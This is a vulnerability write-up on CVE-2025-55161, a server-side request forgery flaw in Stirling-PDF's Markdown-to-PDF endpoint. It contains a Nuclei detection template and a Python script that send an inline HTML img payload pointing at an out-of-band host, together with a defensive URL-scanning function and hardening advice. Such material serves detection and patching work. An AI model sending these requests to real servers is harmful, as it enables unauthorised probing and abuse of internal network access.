Stirling-PDF is a locally hosted web application that performs various operations on PDF files. Prior to version 1.1.0, the /api/v1/convert/markdown/pdf endpoint passes user-supplied Markdown through a sanitizer and then hands it to a third-party converter. The sanitizer can be bypassed, so the converter fetches attacker-controlled URLs while rendering, which is a server-side request forgery (SSRF). The Nuclei template below demonstrates the issue with an inline HTML <img> whose src points at an out-of-band (OAST) host and treats a DNS interaction plus a 200 response of type application/pdf as confirmation.
PoC code (publicly available):
id: CVE-2025-55161

info:
  name: Stirling-PDF SSRF via Markdown
  author: beginee
  severity: high
  description: |
    Stirling-PDF is a locally hosted web application that performs various operations on PDF files. Prior to version 1.1.0, when the /api/v1/convert/markdown/pdf endpoint converts Markdown to PDF, the backend calls a third-party tool to process the input and runs it through a sanitizer first; the sanitizer can be bypassed, resulting in SSRF.
  remediation: This issue has been patched in version 1.1.0.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-55161
    - https://github.com/Stirling-Tools/Stirling-PDF
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
    cvss-score: 8.6
    cve-id: CVE-2025-55161
    cwe-id: CWE-918
    epss-score: 0.03024
    epss-percentile: 0.86137
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.title:"Stirling PDF"
  tags: cve,cve2025,ssrf,stirling-pdf,pdf,markdown,oast,oob

variables:
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /api/v1/convert/markdown/pdf HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvAfAbBmFpYrQfooK

        ------WebKitFormBoundaryvAfAbBmFpYrQfooK
        Content-Disposition: form-data; name="fileInput"; filename="{{filename}}.md"
        Content-Type: application/octet-stream

        <img src='http://{{interactsh-url}}/' />
        ------WebKitFormBoundaryvAfAbBmFpYrQfooK--

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'dns')
          - contains(content_type, "application/pdf")
          - status_code == 200
        condition: and
# digest: 4b0a00483046022100d952265a3083f70f0385940d9390f3e75535f725dc64f3b9b799efc1d0032c00022100b81e1d258a6b26ca213ecc433757f7a7bb38562fb7178406a56b738cb4f354ae:922c64590222798bb761d5b6d8e72950
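The following Python script is an added companion to the template above; it is not Stirling-PDF code and not the template author's. It rebuilds the same multipart request in plain Python, implements the template's three-way DSL matcher as a function, and, on the defensive side, shows the check a Markdown-to-PDF converter needs before rendering: enumerating every URL that would trigger a fetch, including src/href attributes inside inline HTML, which a filter that only understands Markdown's ![alt](url) syntax never sees. Assumptions not stated on the page: the endpoint is reachable without authentication (consistent with PR:N in the CVSS vector), and the operator supplies an OAST hostname they control. The function names, the FETCH_SCHEMES set and the sample inputs in the test are constructed for this example.

```python
"""
Stand-alone companion to the CVE-2025-55161 Nuclei template (added example;
not Stirling-PDF code, not the template author's).

Assumptions: /api/v1/convert/markdown/pdf is reachable unauthenticated and the
caller supplies an out-of-band (OAST) hostname under their control. Only send()
touches the network; everything else is pure and testable offline.
"""
import re
import secrets
import string
import sys
import urllib.request
from urllib.parse import urlparse

ENDPOINT = "/api/v1/convert/markdown/pdf"
BOUNDARY = "----WebKitFormBoundaryvAfAbBmFpYrQfooK"   # same boundary as the template


def random_name(length=5):
    """Equivalent of the template's {{to_lower(rand_text_alpha(5))}} variable."""
    return "".join(secrets.choice(string.ascii_lowercase) for _ in range(length))


def build_multipart(callback_url, filename=None, boundary=BOUNDARY):
    """Build the body the template sends: one part named 'fileInput' whose .md
    content is a raw HTML <img> pointing at the OAST host.
    Returns (content_type_header_value, body_bytes)."""
    filename = filename or random_name()
    body = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="fileInput"; filename="{filename}.md"\r\n'
        "Content-Type: application/octet-stream\r\n"
        "\r\n"
        f"<img src='{callback_url}' />\r\n"
        f"--{boundary}--\r\n"
    )
    return f"multipart/form-data; boundary={boundary}", body.encode()


def matched(status_code, content_type, interactsh_protocol):
    """The template's DSL matcher (condition: and)."""
    return (
        "dns" in interactsh_protocol
        and "application/pdf" in content_type
        and status_code == 200
    )


def send(base_url, callback_url, timeout=30):
    """POST the payload and return (status, content_type, body). Network only."""
    ctype, body = build_multipart(callback_url)
    req = urllib.request.Request(
        base_url.rstrip("/") + ENDPOINT, data=body, method="POST",
        headers={"Content-Type": ctype},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.headers.get("Content-Type", ""), resp.read()


# Defensive side (illustrative, not the project's own sanitizer): a converter
# that must never fetch has to inspect inline HTML attributes as well as the
# Markdown image syntax, otherwise the <img src=...> used above slips through.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\(\s*([^)\s]+)")
HTML_ATTR = re.compile(r"<[^>]*?\b(?:src|href|data|poster)\s*=\s*['\"]?([^'\"\s>]+)", re.I)
FETCH_SCHEMES = {"http", "https", "ftp", "file"}   # constructed list for the example


def remote_references(markdown):
    """Return every URL in the document that would cause a fetch during rendering."""
    refs = []
    for pattern in (MD_IMAGE, HTML_ATTR):
        for m in pattern.finditer(markdown):
            url = m.group(1)
            parsed = urlparse(url)
            # protocol-relative //host/path has a netloc but no scheme; flag it too
            if parsed.scheme.lower() in FETCH_SCHEMES or (not parsed.scheme and parsed.netloc):
                refs.append(url)
    return refs


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} http://target:8080 http://<oast-host>/")
    status, ctype, _ = send(sys.argv[1], sys.argv[2])
    print(f"HTTP {status} {ctype}; now check the OAST server for a DNS or HTTP hit")
```

Two practical notes. The template's matcher only requires a DNS interaction, so a match proves the renderer resolved the attacker's hostname; an HTTP interaction on the OAST side is the stronger evidence that the fetch itself completed. And remote_references() is a pre-render guard, not a substitute for running the converter with outbound network access removed: the safest configuration for a converter that never needs remote resources is to deny egress entirely and reject, rather than rewrite, Markdown that references any remote URL.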